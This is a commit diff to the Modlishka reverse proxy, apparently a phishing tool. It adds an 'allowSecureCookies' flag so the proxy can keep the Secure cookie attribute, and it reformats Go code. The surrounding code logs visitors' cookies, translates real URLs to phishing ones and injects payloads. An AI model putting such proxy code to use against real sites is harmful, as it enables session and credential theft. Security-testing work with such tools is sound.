Allow secure cookies

.gitignore

@@ -0,0 +1,2 @@
+control_plugin_data.db
+Modlishka

config/config.go

@@ -28,7 +28,7 @@ type Options struct {
 	ListeningAddress     *string `json:"listeningAddress"`
 	ListeningPortHTTP    *int    `json:"listeningPortHTTP"`
 	ListeningPortHTTPS   *int    `json:"listeningPortHTTPS"`
-	ProxyAddress     	 *string `json:"proxyAddress"`
+	ProxyAddress         *string `json:"proxyAddress"`
 	Target               *string `json:"target"`
 	TargetRes            *string `json:"targetResources"`
 	TargetRules          *string `json:"rules"`
@@ -45,6 +45,7 @@ type Options struct {
 	DynamicMode          *bool   `json:"dynamicMode"`
 	LogRequestFile       *string `json:"log"`
 	Plugins              *string `json:"plugins"`
+	AllowSecureCookies   *bool   `json:"allowSecureCookies"`
 	*TLSConfig
 }
 
@@ -56,11 +57,11 @@ type TLSConfig struct {
 
 var (
 	C = Options{
-		ProxyDomain:      flag.String("proxyDomain", "", "Proxy domain name that will be used - e.g.: proxy.tld"),
-		ListeningAddress: flag.String("listeningAddress", "127.0.0.1", "Listening address - e.g.: 0.0.0.0 "),
-		ListeningPortHTTP: flag.Int("listeningPortHTTP", 80, "Listening port for HTTP requests"),
+		ProxyDomain:        flag.String("proxyDomain", "", "Proxy domain name that will be used - e.g.: proxy.tld"),
+		ListeningAddress:   flag.String("listeningAddress", "127.0.0.1", "Listening address - e.g.: 0.0.0.0 "),
+		ListeningPortHTTP:  flag.Int("listeningPortHTTP", 80, "Listening port for HTTP requests"),
 		ListeningPortHTTPS: flag.Int("listeningPortHTTPS", 443, "Listening port for HTTPS requests"),
-		Target:           flag.String("target", "", "Target  domain name  - e.g.: target.tld"),
+		Target:             flag.String("target", "", "Target  domain name  - e.g.: target.tld"),
 		TargetRes: flag.String("targetRes", "",
 			"Comma separated list of domains that were not translated automatically. Use this to force domain translation - e.g.: static.target.tld"),
 		TerminateTriggers: flag.String("terminateTriggers", "",
@@ -74,20 +75,21 @@ var (
 
 		ProxyAddress: flag.String("proxyAddress", "", "Proxy that should be used (socks/https/http) - e.g.: http://127.0.0.1:8080 "),
 
-		TrackingCookie: flag.String("trackingCookie", "id", "Name of the HTTP cookie used for track the client"),
-		TrackingParam:  flag.String("trackingParam", "id", "Name of the HTTP parameter used to set up the HTTP cookie tracking of the client"),
+		TrackingCookie:  flag.String("trackingCookie", "id", "Name of the HTTP cookie used for track the client"),
+		TrackingParam:   flag.String("trackingParam", "id", "Name of the HTTP parameter used to set up the HTTP cookie tracking of the client"),
 		Debug:           flag.Bool("debug", false, "Print extra debug information"),
 		DisableSecurity: flag.Bool("disableSecurity", false, "Disable proxy security features like anti-SSRF. 'Here be dragons' - disable at your own risk."),
-		DynamicMode: flag.Bool("dynamicMode", false, "Enable dynamic mode for 'Client Domain Hooking'"),
+		DynamicMode:     flag.Bool("dynamicMode", false, "Enable dynamic mode for 'Client Domain Hooking'"),
 
-		ForceHTTP:           flag.Bool("forceHTTP", false, "Strip all TLS from the traffic and proxy through HTTP only"),
-		ForceHTTPS:           flag.Bool("forceHTTPS", false, "Strip all clear-text from the traffic and proxy through HTTPS only"),
+		ForceHTTP:  flag.Bool("forceHTTP", false, "Strip all TLS from the traffic and proxy through HTTP only"),
+		ForceHTTPS: flag.Bool("forceHTTPS", false, "Strip all clear-text from the traffic and proxy through HTTPS only"),
 
 		LogRequestFile: flag.String("log", "", "Local file to which fetched requests will be written (appended)"),
 
 		LogPostOnly: flag.Bool("postOnly", false, "Log only HTTP POST requests"),
 
-		Plugins: flag.String("plugins", "all", "Comma separated list of enabled plugin names"),
+		Plugins:            flag.String("plugins", "all", "Comma separated list of enabled plugin names"),
+		AllowSecureCookies: flag.Bool("allowSecureCookies", false, "Allow secure cookies to be set. Useful for when you are using HTTPS and cookies have SameSite=None"),
 	}
 
 	s = TLSConfig{
@@ -141,7 +143,6 @@ func ParseConfiguration() Options {
 
 	}
 
-
 	return C
 }
 
@@ -177,24 +178,21 @@ func (c *Options) VerifyConfiguration() {
 			flag.PrintDefaults()
 			os.Exit(1)
 		}
-	} else { 	// default + HTTPS wrapper
-
-			if len(*c.ProxyDomain) == 0 || len(*c.ProxyDomain) == 0 {
-				log.Warningf("Missing required parameters in oder start the proxy. Terminating.")
-				log.Warningf("TIP: You will need to specify at least the following parameters to serve the page over HTTP: proxyDomain and target.")
-				flag.PrintDefaults()
-				os.Exit(1)
-			}
+	} else { // default + HTTPS wrapper
 
+		if len(*c.ProxyDomain) == 0 || len(*c.ProxyDomain) == 0 {
+			log.Warningf("Missing required parameters in oder start the proxy. Terminating.")
+			log.Warningf("TIP: You will need to specify at least the following parameters to serve the page over HTTP: proxyDomain and target.")
+			flag.PrintDefaults()
+			os.Exit(1)
+		}
 
 	}
 
-
 	if *c.DynamicMode == true {
 		log.Warningf("Dynamic Mode enabled: Proxy will accept and hook all incoming HTTP requests.")
 	}
 
-
 	if *c.ForceHTTP == true {
 		log.Warningf("Force HTTP wrapper enabled: Proxy will strip all TLS traffic and handle requests over HTTP only")
 	}

core/helper.go

@@ -67,4 +67,4 @@ func Redirect(w http.ResponseWriter, r *http.Request, url string) {
 	} else {
 		http.Redirect(w, r, "http://"+runtime.TopLevelDomain, 302)
 	}
-}
+}

core/proxy.go

@@ -47,15 +47,15 @@ type ReverseProxy struct {
 	Proxy          *httputil.ReverseProxy // instance of Go ReverseProxy that will proxy requests/responses
 	Config         *config.Options
 	IsTLS          bool
-	RequestContext  *plugin.HTTPContext
+	RequestContext *plugin.HTTPContext
 }
 
 type ReverseProxyFactorySettings struct {
 	config.Options
 	target         string
 	originaltarget string
 	origin         string
-	IsTLS 		   bool
+	IsTLS          bool
 }
 
 type HTTPResponse struct {
@@ -118,7 +118,6 @@ func (p *ReverseProxy) rewriteRequest(r *http.Request) (err error) {
 
 	p.RequestContext.InvokeHTTPRequestHooks(request.Request)
 
-
 	log.HTTPRequest(request.Request, p.RequestContext.UserID)
 
 	// Handle HTTP Body (POST)
@@ -225,9 +224,12 @@ func (httpResponse *HTTPResponse) PatchHeaders(p *ReverseProxy) {
 		log.Cookies(p.RequestContext.UserID, p.Target.String(), httpResponse.Header["Set-Cookie"], p.IP)
 
 		for i, v := range httpResponse.Header["Set-Cookie"] {
-			//strip out the secure Flag
-			r := strings.NewReplacer("Secure", "", "secure", "")
-			cookie := r.Replace(v)
+			cookie := v
+			if runtime.AllowSecureCookies == false {
+				//strip out the secure Flag
+				r := strings.NewReplacer("Secure", "", "secure", "")
+				cookie = r.Replace(cookie)
+			}
 			cookie = runtime.RegexpFindSetCookie.ReplaceAllStringFunc(cookie, runtime.TranslateSetCookie)
 			log.Debugf("Rewriting Set-Cookie Flags: from \n[%s]\n --> \n[%s]\n", httpResponse.Header["Set-Cookie"][i], cookie)
 			httpResponse.Header["Set-Cookie"][i] = cookie
@@ -417,7 +419,6 @@ func (p *ReverseProxy) InjectPayloads(buffer []byte) []byte {
 
 func (p *ReverseProxy) PatchURL(buffer []byte) []byte {
 
-
 	// Translate URLs
 	buffer = []byte(runtime.RegexpUrl.ReplaceAllStringFunc(string(buffer), runtime.RealURLtoPhish))
 
@@ -427,7 +428,6 @@ func (p *ReverseProxy) PatchURL(buffer []byte) []byte {
 		}
 	}
 
-
 	if runtime.ForceHTTPS == true {
 		buffer = bytes.Replace(buffer, []byte("http://"), []byte("https://"), -1)
 	}
@@ -442,8 +442,6 @@ func (p *ReverseProxy) PatchURL(buffer []byte) []byte {
 		}
 	}
 
-
-
 	return buffer
 }
 
@@ -459,18 +457,16 @@ func (s *ReverseProxyFactorySettings) NewReverseProxy() *ReverseProxy {
 		Config:         &s.Options,
 		IsTLS:          s.IsTLS,
 		OriginalTarget: s.originaltarget,
-		RequestContext:  &plugin.HTTPContext{
-			Extra:     make(map[string]string),
+		RequestContext: &plugin.HTTPContext{
+			Extra: make(map[string]string),
 		},
 	}
 
-
-
 	transport := &http.Transport{
 
 		TLSClientConfig: &tls.Config{
 			InsecureSkipVerify: true,
-			Renegotiation: tls.RenegotiateFreelyAsClient,
+			Renegotiation:      tls.RenegotiateFreelyAsClient,
 		},
 		DialContext: (&net.Dialer{
 			Timeout:   10 * time.Second,
@@ -505,7 +501,6 @@ func (s *ReverseProxyFactorySettings) NewReverseProxy() *ReverseProxy {
 		log.Debugf("[Proxy error][Error: %s]", err.Error())
 	}
 
-
 	// Handling: Response
 	rp.Proxy.ModifyResponse = rp.rewriteResponse
 

core/server.go

@@ -34,7 +34,7 @@ var ServerRuntimeConfig *ServerConfig
 type ServerConfig struct {
 	config.Options
 	Handler *http.ServeMux
-	Port string
+	Port    string
 }
 
 type EmbeddedServer struct {
@@ -47,10 +47,10 @@ type EmbeddedServer struct {
 func (conf *ServerConfig) MainHandler(w http.ResponseWriter, r *http.Request) {
 
 	// Patch the FQDN
-	targetDomain,newTLS,TLSvalue := runtime.TranslateRequestHost(r.Host)
+	targetDomain, newTLS, TLSvalue := runtime.TranslateRequestHost(r.Host)
 
 	if !*conf.DisableSecurity && runtime.IsValidRequestHost(r.Host, runtime.ProxyDomain) == false {
-		log.Infof("Redirecting client to %s",runtime.TopLevelDomain)
+		log.Infof("Redirecting client to %s", runtime.TopLevelDomain)
 		Redirect(w, r, "")
 		return
 	}
@@ -83,29 +83,27 @@ func (conf *ServerConfig) MainHandler(w http.ResponseWriter, r *http.Request) {
 		}
 	}
 
-	targetURL:=""
-
+	targetURL := ""
 
-	if (runtime.ForceHTTP == true || runtime.ForceHTTPS == true) && newTLS  == true {
+	if (runtime.ForceHTTP == true || runtime.ForceHTTPS == true) && newTLS == true {
 
-			if TLSvalue == false {
-				targetURL="http://"+ targetDomain
-			} else {
-				targetURL="https://"+targetDomain
-			}
+		if TLSvalue == false {
+			targetURL = "http://" + targetDomain
+		} else {
+			targetURL = "https://" + targetDomain
+		}
 
 	} else {
 
 		if r.TLS != nil {
-			targetURL="https://"+targetDomain
+			targetURL = "https://" + targetDomain
 		} else {
-			targetURL="http://"+targetDomain
+			targetURL = "http://" + targetDomain
 		}
 	}
 
 	log.Debugf("[P] Proxying target [%s] via domain [%s]", targetURL, runtime.ProxyDomain)
 
-
 	origin := r.Header.Get("Origin")
 	settings := &ReverseProxyFactorySettings{
 		conf.Options,
@@ -201,18 +199,18 @@ func RunServer() {
 
 	plugin.RegisterHandler(ServerRuntimeConfig.Handler)
 
-	var listener= string(*ServerRuntimeConfig.ListeningAddress)
+	var listener = string(*ServerRuntimeConfig.ListeningAddress)
 	var portHTTP = strconv.Itoa(*ServerRuntimeConfig.ListeningPortHTTP)
 	var portHTTPS = strconv.Itoa(*ServerRuntimeConfig.ListeningPortHTTPS)
-	
+
 	welcome := fmt.Sprintf(`
 %s
 
 >>>> "Modlishka" Reverse Proxy started - v.1.1 <<<<
 Author: Piotr Duszynski @drk1wi  
 `, runtime.Banner)
 
-	if *ServerRuntimeConfig.ForceHTTP  {
+	if *ServerRuntimeConfig.ForceHTTP {
 
 		var httplistener = listener + ":" + portHTTP
 		welcome = fmt.Sprintf("%s\nListening on [%s]\nProxying HTTP [%s] via --> [http://%s]", welcome, httplistener, runtime.Target, runtime.ProxyDomain)
@@ -224,8 +222,7 @@ Author: Piotr Duszynski @drk1wi
 			log.Fatalf("%s . Terminating.", err)
 		}
 
-	} else if *ServerRuntimeConfig.ForceHTTPS  {
-
+	} else if *ServerRuntimeConfig.ForceHTTPS {
 
 		embeddedTLSServer := &EmbeddedServer{
 			WebServerCertificate:     *ServerRuntimeConfig.TLSCertificate,
@@ -235,54 +232,52 @@ Author: Piotr Duszynski @drk1wi
 
 		embeddedTLSServer.Handler = ServerRuntimeConfig.Handler
 
-		var httpslistener= listener + ":" + portHTTPS
+		var httpslistener = listener + ":" + portHTTPS
 
 		welcome = fmt.Sprintf("%s\nListening on [%s]\nProxying HTTPS [%s] via [https://%s]", welcome, httpslistener, runtime.Target, runtime.ProxyDomain)
 
 		log.Infof("%s", welcome)
 
-
 		err := embeddedTLSServer.ListenAndServeTLS(httpslistener)
 		if err != nil {
 			log.Fatalf(err.Error() + " . Terminating.")
 		}
 
-
-	} else { 	//default mode
+	} else { //default mode
 
 		embeddedTLSServer := &EmbeddedServer{
-				WebServerCertificate:     *ServerRuntimeConfig.TLSCertificate,
-				WebServerKey:             *ServerRuntimeConfig.TLSKey,
-				WebServerCertificatePool: *ServerRuntimeConfig.TLSPool,
-			}
-
-			embeddedTLSServer.Handler = ServerRuntimeConfig.Handler
+			WebServerCertificate:     *ServerRuntimeConfig.TLSCertificate,
+			WebServerKey:             *ServerRuntimeConfig.TLSKey,
+			WebServerCertificatePool: *ServerRuntimeConfig.TLSPool,
+		}
 
-			var HTTPServerRuntimeConfig = &ServerConfig{
-				Options: ServerRuntimeConfig.Options,
-				Handler: ServerRuntimeConfig.Handler,
-				Port:    portHTTP,
-			}
+		embeddedTLSServer.Handler = ServerRuntimeConfig.Handler
 
-			var httpslistener= listener + ":" + portHTTPS
-			var httplistener= listener + ":" + portHTTP
+		var HTTPServerRuntimeConfig = &ServerConfig{
+			Options: ServerRuntimeConfig.Options,
+			Handler: ServerRuntimeConfig.Handler,
+			Port:    portHTTP,
+		}
 
-			welcome = fmt.Sprintf("%s\nListening on [%s]\nProxying HTTPS [%s] via [https://%s]", welcome, httpslistener, runtime.Target, runtime.ProxyDomain)
-			welcome = fmt.Sprintf("%s\nListening on [%s]\nProxying HTTP [%s] via [http://%s]", welcome, httplistener, runtime.Target, runtime.ProxyDomain)
+		var httpslistener = listener + ":" + portHTTPS
+		var httplistener = listener + ":" + portHTTP
 
-			log.Infof("%s", welcome)
+		welcome = fmt.Sprintf("%s\nListening on [%s]\nProxying HTTPS [%s] via [https://%s]", welcome, httpslistener, runtime.Target, runtime.ProxyDomain)
+		welcome = fmt.Sprintf("%s\nListening on [%s]\nProxying HTTP [%s] via [http://%s]", welcome, httplistener, runtime.Target, runtime.ProxyDomain)
 
-			go func() {
-				server := &http.Server{Addr: httplistener, Handler: HTTPServerRuntimeConfig.Handler}
-				if err := server.ListenAndServe(); err != nil {
-					log.Fatalf("%s . Terminating.", err)
-				}
-			}()
+		log.Infof("%s", welcome)
 
-			err := embeddedTLSServer.ListenAndServeTLS(httpslistener)
-			if err != nil {
-				log.Fatalf(err.Error() + " . Terminating.")
+		go func() {
+			server := &http.Server{Addr: httplistener, Handler: HTTPServerRuntimeConfig.Handler}
+			if err := server.ListenAndServe(); err != nil {
+				log.Fatalf("%s . Terminating.", err)
 			}
+		}()
 
+		err := embeddedTLSServer.ListenAndServeTLS(httpslistener)
+		if err != nil {
+			log.Fatalf(err.Error() + " . Terminating.")
 		}
+
 	}
+}